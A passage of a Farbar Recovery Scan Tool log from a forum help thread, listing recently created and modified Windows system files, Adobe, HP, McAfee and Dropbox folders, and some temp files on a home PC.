2016-04-22 15:24 - 2016-01-22 00:58 - 02464256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
2016-04-22 15:24 - 2015-08-06 12:47 - 04710400 _____ (Microsoft Corporation) C:\Windows\system32\d2d1.dll
2016-04-22 15:24 - 2015-08-06 12:18 - 04068352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d2d1.dll
2016-04-22 15:09 - 2015-09-02 22:18 - 02531400 _____ (Microsoft Corporation) C:\Windows\system32\msxml6.dll
2016-04-22 15:09 - 2015-09-02 22:17 - 01903848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml6.dll
2016-04-22 15:09 - 2015-01-29 20:53 - 02819584 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers.dll
2016-04-22 15:09 - 2014-11-14 02:58 - 00116736 _____ (Microsoft Corporation) C:\Windows\system32\SystemSettingsDatabase.dll
2016-04-22 15:07 - 2015-04-01 18:22 - 02985984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dbgeng.dll
2016-04-22 15:07 - 2015-04-01 18:20 - 04417536 _____ (Microsoft Corporation) C:\Windows\system32\dbgeng.dll
2016-04-22 15:07 - 2015-03-31 23:45 - 01491456 _____ (Microsoft Corporation) C:\Windows\system32\dbghelp.dll
2016-04-22 15:07 - 2015-03-31 22:31 - 01207296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dbghelp.dll
2016-04-22 08:30 - 2015-06-12 13:03 - 18823680 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.dll
2016-04-22 08:30 - 2015-06-12 12:36 - 15159296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Xaml.dll
2016-04-22 08:28 - 2016-04-04 02:35 - 00046768 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2016-04-22 08:28 - 2016-04-02 09:26 - 01386496 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2016-04-22 08:28 - 2016-04-02 09:26 - 01169408 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2016-04-22 08:28 - 2016-03-28 09:21 - 00698368 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2016-04-22 08:28 - 2016-03-28 09:21 - 00499200 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2016-04-22 08:28 - 2016-03-28 09:21 - 00279040 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2016-04-22 08:28 - 2016-03-28 09:21 - 00215040 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2016-04-22 08:28 - 2016-03-28 09:21 - 00076800 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2016-04-22 08:28 - 2016-02-02 14:16 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rasl2tp.sys
2016-04-22 08:28 - 2016-01-21 15:35 - 00952928 _____ (Microsoft Corporation) C:\Windows\system32\mfmp4srcsnk.dll
2016-04-22 08:28 - 2016-01-21 14:42 - 00786152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmp4srcsnk.dll
2016-04-22 08:28 - 2015-05-07 12:47 - 00564224 _____ (Microsoft Corporation) C:\Windows\system32\apphelp.dll
2016-04-22 08:28 - 2015-03-10 21:49 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\sdbinst.exe
2016-04-22 08:28 - 2015-03-10 21:09 - 00021504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sdbinst.exe
2016-04-22 08:28 - 2014-10-28 22:45 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\shimeng.dll
2016-04-22 08:28 - 2014-10-28 22:00 - 00642560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apphelp.dll
2016-04-22 08:28 - 2014-10-28 22:00 - 00005632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shimeng.dll
2016-04-22 08:21 - 2016-03-10 15:19 - 07452512 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-04-22 08:21 - 2016-03-10 15:17 - 01663192 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2016-04-22 08:21 - 2016-03-10 15:17 - 01523216 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2016-04-22 08:21 - 2016-03-10 15:17 - 01490128 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2016-04-22 08:21 - 2016-03-10 15:17 - 01358960 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2016-04-22 08:21 - 2016-03-10 15:17 - 01133752 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2016-04-22 08:21 - 2016-03-10 13:48 - 00862720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2016-04-22 08:21 - 2016-03-10 13:43 - 00161280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msorcl32.dll
2016-04-22 08:21 - 2016-03-10 12:55 - 00166400 _____ (Microsoft Corporation) C:\Windows\system32\mtxoci.dll
2016-04-22 08:21 - 2016-03-10 12:42 - 00116736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mtxoci.dll
2016-04-22 08:21 - 2016-02-03 11:11 - 01673728 _____ (Microsoft Corporation) C:\Windows\system32\workfolderssvc.dll
2016-04-22 08:21 - 2016-02-02 13:51 - 00162304 _____ (Microsoft Corporation) C:\Windows\system32\WsmAuto.dll
2016-04-22 08:21 - 2016-02-02 13:19 - 00144384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmAuto.dll
2016-04-22 08:21 - 2016-02-02 13:15 - 00787456 _____ (Microsoft Corporation) C:\Windows\system32\WorkfoldersControl.dll
2016-04-22 08:21 - 2016-02-02 13:01 - 00031744 _____ (Microsoft Corporation) C:\Windows\system32\WsmAgent.dll
2016-04-22 08:21 - 2016-02-02 12:51 - 02609152 _____ (Microsoft Corporation) C:\Windows\system32\WsmSvc.dll
2016-04-22 08:21 - 2016-02-02 12:48 - 00285184 _____ (Microsoft Corporation) C:\Windows\system32\WsmWmiPl.dll
2016-04-22 08:21 - 2016-02-02 12:46 - 00026112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmAgent.dll
2016-04-22 08:21 - 2016-02-02 12:41 - 02170880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll
2016-04-22 08:21 - 2016-02-02 12:39 - 00236032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmWmiPl.dll
2016-04-22 08:21 - 2016-01-27 11:18 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\rpcss.dll
2016-04-22 08:21 - 2016-01-13 17:26 - 01737080 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2016-04-22 08:21 - 2016-01-13 17:26 - 01501488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2016-04-22 08:21 - 2016-01-10 14:18 - 00246784 _____ (Microsoft Corporation) C:\Windows\system32\microsoft-windows-system-events.dll
2016-04-22 08:21 - 2014-10-28 22:19 - 00136192 _____ (Microsoft Corporation) C:\Windows\system32\WorkFolders.exe
2016-04-22 08:21 - 2014-10-28 22:18 - 00031744 _____ (Microsoft Corporation) C:\Windows\system32\wsmprovhost.exe
2016-04-22 08:21 - 2014-10-28 22:16 - 00030208 _____ (Microsoft Corporation) C:\Windows\system32\WSManHTTPConfig.exe
2016-04-22 08:21 - 2014-10-28 21:50 - 00193536 _____ (Microsoft Corporation) C:\Windows\system32\WorkFoldersShell.dll
2016-04-22 08:21 - 2014-10-28 21:44 - 00070656 _____ (Microsoft Corporation) C:\Windows\system32\WSManMigrationPlugin.dll
2016-04-22 08:21 - 2014-10-28 21:39 - 00035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsmprovhost.exe
2016-04-22 08:21 - 2014-10-28 21:37 - 00031744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManHTTPConfig.exe
2016-04-22 08:21 - 2014-10-28 21:28 - 00015872 _____ (Microsoft Corporation) C:\Windows\system32\wsmplpxy.dll
2016-04-22 08:21 - 2014-10-28 21:14 - 00058880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSManMigrationPlugin.dll
2016-04-22 08:21 - 2014-10-28 21:05 - 00011776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wsmplpxy.dll
2016-04-22 08:19 - 2016-02-05 11:11 - 00845312 _____ (Microsoft Corporation) C:\Windows\system32\BFE.DLL
2016-04-22 08:19 - 2016-02-05 11:11 - 00422400 _____ (Microsoft Corporation) C:\Windows\system32\FWPUCLNT.DLL
2016-04-22 08:19 - 2016-02-05 11:07 - 00272384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FWPUCLNT.DLL
2016-04-22 08:19 - 2016-02-05 11:02 - 01083904 _____ (Microsoft Corporation) C:\Windows\system32\IKEEXT.DLL
2016-04-22 08:19 - 2016-02-04 12:23 - 00713216 _____ (Microsoft Corporation) C:\Windows\system32\nshwfp.dll
2016-04-22 08:19 - 2016-02-04 12:22 - 00561664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\nshwfp.dll
2016-04-22 08:19 - 2016-01-26 15:15 - 00072024 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\vpci.sys
2016-04-22 08:19 - 2016-01-22 04:03 - 00419168 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\spaceport.sys
2016-04-22 08:19 - 2016-01-22 01:27 - 01335296 _____ (Microsoft Corporation) C:\Windows\system32\mispace.dll
2016-04-22 08:19 - 2016-01-22 01:22 - 02487296 _____ (Microsoft Corporation) C:\Windows\system32\storagewmi.dll
2016-04-22 08:19 - 2016-01-22 01:13 - 01063424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mispace.dll
2016-04-22 08:19 - 2016-01-22 01:11 - 01482240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\storagewmi.dll
2016-04-22 08:19 - 2014-10-28 21:27 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\smphost.dll
2016-04-22 08:19 - 2014-10-28 21:21 - 00026112 _____ (Microsoft Corporation) C:\Windows\system32\delegatorprovider.dll
2016-04-22 08:19 - 2014-10-28 21:21 - 00023552 _____ (Microsoft Corporation) C:\Windows\system32\storagewmi_passthru.dll
2016-04-22 08:19 - 2014-10-28 21:04 - 00011776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\smphost.dll
2016-04-22 08:19 - 2014-10-28 21:00 - 00020480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\delegatorprovider.dll
2016-04-22 08:19 - 2014-10-28 21:00 - 00019968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\storagewmi_passthru.dll
2016-04-22 08:18 - 2016-01-10 13:50 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\cfgbkend.dll
2016-04-22 08:18 - 2016-01-10 13:16 - 00898048 _____ (Microsoft Corporation) C:\Windows\system32\CPFilters.dll
2016-04-22 08:18 - 2016-01-10 13:14 - 00048640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cfgbkend.dll
2016-04-22 08:18 - 2016-01-10 13:12 - 00532480 _____ (Microsoft Corporation) C:\Windows\system32\EncDec.dll
2016-04-22 08:18 - 2016-01-10 12:51 - 00702976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CPFilters.dll
2016-04-22 08:18 - 2016-01-10 12:49 - 00443392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\EncDec.dll
2016-04-22 08:18 - 2016-01-08 21:49 - 00218448 _____ (Microsoft Corporation) C:\Windows\system32\rsaenh.dll
2016-04-22 08:18 - 2016-01-08 21:49 - 00192120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rsaenh.dll
2016-04-22 08:18 - 2015-12-02 11:04 - 00670208 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll
2016-04-22 08:18 - 2015-12-02 11:01 - 00561664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qedit.dll
2016-04-22 08:17 - 2016-01-06 19:46 - 00148752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wscapi.dll
2016-04-22 08:17 - 2016-01-06 19:45 - 00177712 _____ (Microsoft Corporation) C:\Windows\system32\wscapi.dll
2016-04-22 08:17 - 2016-01-06 12:47 - 00146944 _____ (Microsoft Corporation) C:\Windows\system32\wscsvc.dll
2016-04-22 08:17 - 2014-10-28 22:40 - 00014848 _____ (Microsoft Corporation) C:\Windows\system32\wscproxystub.dll
2016-04-22 08:17 - 2014-10-28 22:35 - 00025088 _____ (Microsoft Corporation) C:\Windows\system32\wscisvif.dll
2016-04-22 08:17 - 2014-10-28 21:56 - 00011264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wscproxystub.dll
2016-04-22 08:17 - 2014-10-28 21:52 - 00020992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wscisvif.dll
2016-04-22 08:06 - 2015-03-01 21:43 - 00222208 _____ (Microsoft Corporation) C:\Windows\system32\rastapi.dll
2016-04-22 08:06 - 2015-03-01 21:21 - 00207872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastapi.dll
2016-04-22 08:06 - 2014-10-28 22:48 - 00011776 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rootmdm.sys
2016-04-22 08:06 - 2014-10-28 22:42 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\unimdmat.dll
2016-04-22 08:06 - 2014-10-28 22:34 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\uniplat.dll
2016-04-22 08:06 - 2014-10-28 21:58 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\unimdmat.dll
2016-04-22 08:06 - 2014-10-28 21:51 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\uniplat.dll
2016-04-22 08:03 - 2015-10-03 15:41 - 01385280 _____ (Microsoft Corporation) C:\Windows\system32\msctf.dll
2016-04-22 08:03 - 2015-10-03 15:41 - 01124384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msctf.dll
2016-04-22 08:03 - 2015-07-10 14:19 - 01101824 _____ (Microsoft Corporation) C:\Windows\system32\rdvidcrl.dll
2016-04-22 08:03 - 2015-07-10 13:14 - 00856064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdvidcrl.dll
2016-04-22 08:03 - 2015-07-10 13:13 - 07032320 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2016-04-22 08:03 - 2015-07-10 12:31 - 06213120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2016-04-22 08:03 - 2014-10-28 22:24 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\tsgqec.dll
2016-04-22 08:03 - 2014-10-28 21:43 - 00052736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tsgqec.dll
2016-04-22 08:02 - 2016-02-05 10:46 - 01455104 _____ (Microsoft Corporation) C:\Windows\system32\VSSVC.exe
2016-04-22 08:02 - 2016-02-03 11:14 - 00080896 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\IPMIDrv.sys
2016-04-22 08:01 - 2016-02-05 15:07 - 00378712 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\storport.sys
2016-04-22 08:01 - 2016-02-04 14:07 - 00222720 _____ (Microsoft Corporation) C:\Windows\system32\dhcpsapi.dll
2016-04-22 08:01 - 2016-02-04 13:35 - 00142848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dhcpsapi.dll
2016-04-22 08:01 - 2016-02-02 13:18 - 01574912 _____ (Microsoft Corporation) C:\Windows\system32\wbengine.exe
2016-04-22 08:01 - 2016-01-31 13:17 - 00779264 _____ (Microsoft Corporation) C:\Windows\system32\WindowsAnytimeUpgradeui.exe
2016-04-22 08:01 - 2016-01-20 18:40 - 00099672 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\disk.sys
2016-04-22 08:00 - 2016-02-06 19:05 - 00551256 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\vhdmp.sys
2016-04-22 08:00 - 2016-02-06 18:41 - 00316760 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\volsnap.sys
2016-04-22 07:56 - 2016-04-22 07:56 - 00001248 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk
2016-04-22 07:56 - 2016-04-22 07:56 - 00001236 _____ C:\Users\Public\Desktop\Adobe Creative Cloud.lnk
2016-04-22 07:54 - 2016-04-22 15:45 - 00000000 ____D C:\ProgramData\Adobe
2016-04-22 07:53 - 2016-04-22 07:53 - 00000000 ____D C:\Program Files (x86)\Adobe
2016-04-21 22:13 - 2015-09-24 12:42 - 00348672 _____ (Microsoft Corporation) C:\Windows\system32\bdesvc.dll
2016-04-21 22:13 - 2015-09-24 12:40 - 00737280 _____ (Microsoft Corporation) C:\Windows\system32\fveapi.dll
2016-04-21 22:13 - 2014-10-28 22:13 - 00054272 _____ (Microsoft Corporation) C:\Windows\system32\BdeUISrv.exe
2016-04-21 22:13 - 2014-10-28 21:26 - 00103424 _____ (Microsoft Corporation) C:\Windows\system32\BitLockerDeviceEncryption.exe
2016-04-21 22:13 - 2014-10-28 21:16 - 00216064 _____ (Microsoft Corporation) C:\Windows\system32\fveapibase.dll
2016-04-21 22:06 - 2016-03-15 19:00 - 00561952 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2016-04-21 22:06 - 2016-03-15 10:14 - 01441792 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2016-04-21 22:06 - 2016-03-11 10:48 - 00833024 _____ (Microsoft Corporation) C:\Windows\system32\samsrv.dll
2016-04-21 22:06 - 2016-03-10 14:22 - 00201728 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2016-04-21 22:06 - 2016-03-10 14:21 - 00401920 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2016-04-21 22:06 - 2016-03-10 14:20 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2016-04-21 22:06 - 2016-03-10 13:44 - 00445440 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2016-04-21 22:06 - 2016-03-10 13:16 - 00324096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2016-04-21 22:06 - 2016-03-10 13:03 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\samlib.dll
2016-04-21 22:06 - 2016-03-10 12:48 - 00064512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\samlib.dll
2016-04-21 22:05 - 2016-03-03 12:47 - 02345472 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2016-04-21 22:05 - 2016-03-03 12:33 - 01556992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
2016-04-21 22:05 - 2016-03-02 21:39 - 01661576 _____ (Microsoft Corporation) C:\Windows\system32\ole32.dll
2016-04-21 22:05 - 2016-03-02 21:39 - 01212248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ole32.dll
2016-04-21 21:59 - 2015-12-03 15:42 - 00397224 _____ (Microsoft Corporation) C:\Windows\system32\bcryptprimitives.dll
2016-04-21 21:59 - 2015-12-03 15:42 - 00137968 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2016-04-21 21:59 - 2015-12-03 15:42 - 00106960 _____ (Microsoft Corporation) C:\Windows\system32\ncryptsslp.dll
2016-04-21 21:59 - 2015-12-03 15:41 - 00177488 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2016-04-21 21:59 - 2015-12-03 14:52 - 00340872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcryptprimitives.dll
2016-04-21 21:59 - 2015-12-03 14:52 - 00120376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2016-04-21 21:59 - 2015-12-03 14:52 - 00091416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncryptsslp.dll
2016-04-21 21:59 - 2015-12-03 13:07 - 00432128 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2016-04-21 21:59 - 2015-12-03 12:45 - 00357888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2016-04-21 21:59 - 2015-11-21 12:59 - 01706496 _____ (Microsoft Corporation) C:\Windows\system32\comsvcs.dll
2016-04-21 21:59 - 2015-11-21 12:49 - 01344000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comsvcs.dll
2016-04-21 21:59 - 2015-11-21 12:47 - 00522240 _____ (Microsoft Corporation) C:\Windows\system32\catsrvut.dll
2016-04-21 21:59 - 2015-11-21 12:40 - 00414208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\catsrvut.dll
2016-04-21 21:58 - 2016-03-03 12:13 - 00059392 _____ (Microsoft Corporation) C:\Windows\system32\basesrv.dll
2016-04-21 21:54 - 2016-03-29 10:05 - 04175872 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-04-21 21:52 - 2016-04-13 19:45 - 00453280 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2016-04-21 21:18 - 2016-05-01 01:34 - 00000000 ____D C:\Users\xains_000\AppData\Local\Adobe
2016-04-21 21:17 - 2016-04-21 21:17 - 00692416 _____ (Adobe Systems Incorporated) C:\Users\xains_000\Downloads\CreativeCloudSet-Up.exe
2016-04-21 21:16 - 2016-04-21 21:16 - 00000000 ____D C:\Users\xains_000\AppData\Roaming\Macromedia
2016-04-21 21:10 - 2016-04-21 21:10 - 00014336 ___SH C:\Users\xains_000\Downloads\Thumbs.db
2016-04-21 20:56 - 2016-02-12 15:14 - 00136904 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2016-04-21 20:56 - 2016-02-12 11:14 - 03708416 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2016-04-21 20:56 - 2016-02-12 10:55 - 00409088 _____ (Microsoft Corporation) C:\Windows\system32\WUSettingsProvider.dll
2016-04-21 20:56 - 2016-02-12 10:54 - 00140288 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2016-04-21 20:56 - 2016-02-12 10:54 - 00095744 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2016-04-21 20:56 - 2016-02-12 10:54 - 00035840 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2016-04-21 20:56 - 2016-02-12 10:51 - 00124928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuwebv.dll
2016-04-21 20:56 - 2016-02-12 10:51 - 00081920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2016-04-21 20:56 - 2016-02-12 10:51 - 00029696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe
2016-04-21 20:56 - 2016-02-12 10:48 - 02244096 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2016-04-21 20:56 - 2016-02-12 10:47 - 00897024 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2016-04-21 20:56 - 2016-02-12 10:46 - 00726528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2016-04-21 20:56 - 2015-11-20 14:18 - 00052224 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2016-04-21 20:56 - 2015-07-09 14:40 - 00359936 _____ (Microsoft Corporation) C:\Windows\system32\WinSetupUI.dll
2016-04-21 20:56 - 2015-06-26 23:08 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2016-04-21 20:56 - 2015-06-26 22:14 - 00027136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-05-06 03:17 - 2016-03-07 05:49 - 00003942 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{6A256493-DFB7-412B-A160-B05F630BC0F8}
2016-05-01 06:48 - 2016-03-07 05:37 - 00003594 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2829069514-779319184-155462201-1004
2016-05-01 06:25 - 2013-08-22 11:36 - 00000000 ____D C:\Windows\AppReadiness
2016-05-01 06:24 - 2016-03-07 05:29 - 00000000 ____D C:\Users\xains_000\AppData\Local\Packages
2016-05-01 06:16 - 2016-03-07 05:30 - 00000000 ____D C:\Users\xains_000\Documents\Youcam
2016-05-01 06:16 - 2014-03-18 05:53 - 00958356 _____ C:\Windows\system32\PerfStringBackup.INI
2016-05-01 06:16 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\Inf
2016-05-01 06:13 - 2016-03-07 05:36 - 00000000 ____D C:\Users\xains_000\OneDrive
2016-05-01 06:10 - 2013-08-22 10:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-05-01 06:09 - 2013-08-22 10:44 - 00491624 _____ C:\Windows\system32\FNTCACHE.DAT
2016-05-01 06:03 - 2014-07-20 21:14 - 00000000 ____D C:\ProgramData\McAfee
2016-05-01 06:00 - 2013-08-22 11:36 - 00000000 ___HD C:\Program Files\WindowsApps
2016-05-01 05:55 - 2015-09-29 19:50 - 00000952 _____ C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-2829069514-779319184-155462201-1001UA.job
2016-05-01 04:42 - 2016-03-07 05:30 - 00000000 ____D C:\Users\xains_000\AppData\Local\Hewlett-Packard
2016-05-01 04:18 - 2013-08-22 11:20 - 00000000 ____D C:\Windows\CbsTemp
2016-05-01 03:29 - 2014-04-24 12:20 - 00000000 ____D C:\Windows\System32\Tasks\Hewlett-Packard
2016-05-01 03:29 - 2014-04-24 12:20 - 00000000 ____D C:\ProgramData\Hewlett-Packard
2016-05-01 03:28 - 2014-04-24 12:20 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP Help and Support
2016-05-01 03:28 - 2014-04-24 12:14 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2016-05-01 03:27 - 2014-04-24 12:10 - 00000000 ____D C:\Program Files (x86)\Hewlett-Packard
2016-05-01 03:19 - 2014-03-31 21:07 - 00000000 ____D C:\SWSetup
2016-05-01 03:04 - 2014-07-20 21:14 - 00000000 ____D C:\Program Files (x86)\McAfee
2016-05-01 03:03 - 2014-07-20 21:14 - 00000000 ____D C:\Program Files\Common Files\mcafee
2016-05-01 03:03 - 2013-08-22 09:25 - 00262144 ___SH C:\Windows\system32\config\ELAM
2016-05-01 03:01 - 2014-07-20 20:54 - 00000000 ____D C:\Program Files\Common Files\Intel
2016-05-01 03:01 - 2014-07-20 20:48 - 00000000 ____D C:\Program Files\Intel
2016-05-01 03:01 - 2013-08-22 11:36 - 00000000 ___HD C:\Windows\ELAMBKUP
2016-05-01 02:25 - 2013-08-22 09:25 - 00524288 ___SH C:\Windows\system32\config\BBI
2016-05-01 02:24 - 2014-04-24 12:14 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Security and Protection
2016-05-01 02:22 - 2015-01-18 09:49 - 00000000 ____D C:\Users\NULL
2016-05-01 02:16 - 2013-08-22 11:36 - 00000000 ____D C:\Windows\PolicyDefinitions
2016-04-26 16:50 - 2013-08-22 11:36 - 00000000 ____D C:\Windows\AppCompat
2016-04-22 15:45 - 2016-03-07 05:29 - 00000000 ____D C:\Users\xains_000\AppData\Roaming\Adobe
2016-04-22 15:44 - 2016-03-07 05:28 - 00000000 ____D C:\Users\xains_000
2016-04-22 15:35 - 2015-01-25 10:47 - 00000000 ___SD C:\Windows\system32\CompatTel
2016-04-22 15:35 - 2015-01-25 10:47 - 00000000 ____D C:\Windows\system32\appraiser
2016-04-22 15:35 - 2013-08-22 11:36 - 00000000 ___RD C:\Windows\ToastData
2016-04-22 15:35 - 2013-08-22 11:36 - 00000000 ___RD C:\Windows\ImmersiveControlPanel
2016-04-22 15:34 - 2015-01-27 09:27 - 00000000 ____D C:\Windows\system32\MRT
2016-04-22 15:31 - 2015-01-27 09:27 - 135176864 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2016-04-22 08:12 - 2013-08-22 11:36 - 00000000 ____D C:\Windows\rescache
2016-04-22 07:56 - 2014-07-20 20:55 - 00000000 ____D C:\ProgramData\Package Cache
2016-04-21 21:15 - 2016-03-07 21:43 - 00000000 ____D C:\Users\xains_000\AppData\Local\Mozilla
2016-04-21 20:56 - 2014-03-18 05:38 - 00000000 ____D C:\Program Files\Windows Journal
2016-04-05 17:53 - 2013-08-22 11:38 - 00829944 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2016-04-05 17:53 - 2013-08-22 11:38 - 00176632 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl

Some files in TEMP:
====================
C:\Users\Christina\AppData\Local\Temp\DRHelper_installFinish.exe
C:\Users\Christina\AppData\Local\Temp\DRHelper_installStart.exe
C:\Users\Christina\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpzvjbpx.dll
C:\Users\Christina\AppData\Local\Temp\SetupO365HomePremRetail.x86.en-US_O365HomePremRetail_2FQCN-B4W6J-7MJRT-6XWGP-DC8F4_act_1_.exe
C:\Users\Christina\AppData\Local\Temp\{211F8AF6-DA31-4C3D-B589-E2449E3079A3}-DropboxClient_3.18.1.exe
C:\Users\Christina\AppData\Local\Temp\{48417D70-EF42-413B-818B-B0E7B1141786}-DropboxClient_3.18.1.exe
C:\Users\xains_000\AppData\Local\Temp\HPSFUpdater.exe
C:\Users\xains_000\AppData\Local\Temp\McCSPInstall.dll
C:\Users\xains_000\AppData\Local\Temp\UninstallHPSA.exe
 
#15 · (Edited)
Additional:
Additional scan result of Farbar Recovery Scan Tool (x64) Version:30-04-2016
